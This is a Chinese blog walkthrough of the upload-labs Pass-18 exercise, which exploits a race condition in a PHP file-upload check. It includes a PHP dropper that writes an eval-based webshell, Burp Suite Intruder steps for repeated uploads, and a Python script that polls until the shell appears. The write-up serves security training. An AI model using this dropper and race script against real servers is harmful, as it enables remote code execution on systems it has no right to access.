2. 程式人生 > 其它 >檔案上傳 upload-labs Pass-18 條件競爭

檔案上傳 upload-labs Pass-18 條件競爭

阿新 發佈:2022-04-09

Pass-18 條件競爭
審計原始碼

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允許上傳.jpg|.png|.gif型別檔案!";
            unlink($upload_file);
        }
    }else{
        $msg = '上傳出錯!';
    }
}

可以看到首先使用move_uploaded_file將檔案進行上傳,然後進行字尾名判斷,如果不滿足.jpg|.png|.gif檔案型別,直接刪除
這裡的漏洞就是我們的檔案首先可以上傳到服務區,伺服器經過if語句判斷是否刪除該檔案
那麼我們在伺服器沒有刪除檔案的時候,進行訪問上傳的php檔案,上傳php訪問執行後會生成一個一句話木馬檔案
上傳檔案取名為create-shell.php

<?php fwrite(fopen('shell.php','w'),'<?php @eval($_POST[cmd]);?>');?>


首先我們使用burpsuite抓包,爆破模式一直上傳檔案


首先clear

清楚所有變數

在末尾加入1,然後點選設定為變數

然後點選payload

然後點選Options,設定完點選Start attack為開始攻擊,這裡先展示不開始攻擊

寫一個訪問creat-shell.php檔案,並判斷shell.php是否已經生成的python指令碼
轉載於:【upload-labs】條件競爭pass-17~pass-18

import requests
url1 = "http://ip/upload-labs/upload/create-shell.php"    # 定義訪問 creat-shell.php
url2 = "http://ip/upload-labs/upload/shell.php"           # 定義訪問 shell.php
while True:  # 定義死迴圈
	html1 = requests.get(url1)  # 請求 create-shell.php
	html2 = requests.get(url2)  # 請求 shell.php
	if html2.status_code == 200:  # 如果 shell.php 返回的http狀態碼為200
		print('Good job,Win Win Win')  # 列印 Good job.....
		break

相關推薦

檔案 upload-labs Pass-18 條件競爭

Pass-18 條件競爭 審計原始碼 $is_upload = false; $msg = null; if(isset($_POST[\'submit\'])){ $ext_arr = array(\'jpg\',\'png\',\'gif\');

檔案 upload-labs Pass 11-1

Pass11 審計原始碼 $is_upload = false; $msg = null; if(isset($_POST[\'submit\'])){ $ext_arr = array(\'jpg\',\'png\',\'gif\');

檔案 upload-labs Pass-17 二次渲染

Pass-17 審計原始碼 $is_upload = false; $msg = null; if (isset($_POST[\'submit\'])){ // 獲得檔案的基本資訊,檔名,型別,大小,臨時檔案路徑

檔案漏洞:upload-labs(二)

Pass-11 原始碼 $is_upload = false; $msg = null; if(isset($_POST[\'submit\'])){ $ext_arr = array(\'jpg\',\'png\',\'gif\');

Upload-labs 檔案靶場通關攻略(下)

Upload-Labs靶場攻略(下) Pass-11 GET型參,目錄可設定,考慮00截斷,在/upload/後新增1.php%00,即可

upload labs檔案

靶場搭建 配置項 配置 描述 作業系統 Window or Linux 推薦使用Windows,除了Pass-19必須在linux下,其餘Pass都可以在Windows執行

檔案靶場upload-labs實戰

前言 來具體學習一下檔案的相關知識,參考教程:https://blog.csdn.net/qq_43390703/article/details/104858705,dalao寫的很全面了,後續我應該還會再補一個user.ini配置檔案的。

檔案(File Upload

檔案上傳(File Upload) FileUpload,及檔案上傳漏洞,通常是由於對上傳檔案的型別、內容沒有進行嚴格過濾、檢查,使得可以的上傳webshell獲取伺服器許可權,因此檔案上傳漏洞帶來的危害常常是毀滅性的。

DVWA—File Upload 檔案

Low 原始碼: <?php if( isset( $_POST[ \'Upload\' ] ) ) { // Where are we going to be writing to? $target_path= DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";

ant-design-vue 之upload 檔案

ant-design-vue 之upload 檔案 01) 單檔案 使用:before-upload=\"beforeUpload\"和@change=\"handleChange\"

DVWA 通關指南:File Upload(檔案)

目錄File Upload(檔案)Low Level原始碼審計攻擊方式原始碼審計攻擊方式High Level原始碼審計攻擊方式Impossible Level總結參考資料

DVWA靶場——File Upload(檔案)

概述 檔案上傳功能在web應用系統很常見,比如很多網站註冊的時候需要上傳頭像、上傳附件等等。當用戶點選上傳按鈕後,後臺會對上傳檔案進行判斷 比如是否是指定的型別、字尾名、大小等等,然後將其按照設計的格式進

CTF-i春秋-Web-檔案包含漏洞、檔案漏洞-Do you know upload?-第三屆“百越杯”福建省高校網路空間安全大賽

2020.09.21 經驗教訓 檔案包含漏洞,想到php://input和php://filter/read=convert.base64-encode/resource=index.php

檔案限制條件(JS、字尾、檔名、型別、截斷)繞過及修復建議

在現代網際網路的Web應用程式中,上傳檔案是一 種常見的功能,因為它有助於提高業務效率,比如企業的OA系統,允許使用者上傳圖片、視訊、頭像和許多其他型別的檔案。然而向用戶提供的功能越多,Web應用受到攻擊的風險

關於vue專案中檔案,復現,模版下載常見用法(el-upload

最新在做一個頁面,涉及到檔案檔案回顯,介面如下: 直接檔案程式碼,這裡算是較為全面的檔案

使用Vue.extend實現iview Upload在單檔案時,拖拽多個檔案給出錯誤提示

1. 擴充套件Select元件,註冊新的元件(global-components.js檔案中進行) import Vue from \'vue\';

el-upload檔案

技術標籤:vuevue 1. 檔案元件封裝 UploadResourcesFile.vue <template> <div class="upload-file-panel"

vue element upload 七牛雲實現檔案(還沒有分片和斷點續)

程式碼沒有排版,只是demo,輕噴哈哈哈 vue: 父元件HelloWorld.vue <template> <div>

a-upload(檔案)元件change事件怎麼參;以及限制只一個檔案,再次時替換(覆蓋)以前的檔案

一:html結構(change事件參函式改變) <a-upload name=\"file\" :multiple=\"true\" accept=\".zip,.json\" :before-upload=\"beforeUpload\" :remove=\"projectHandleRemove\" @change=\"value => handleC

檔案條件競爭

檔案上傳-條件競爭 作者:Mi2ac1e 培訓:https://tysec.top/?p=792 一直以來都知道檔案上傳中有一個繞過方法是條件競爭,但沒有實際試驗過。於是在今天實驗的過程中發現了一些問題,寫這篇文章記錄一下。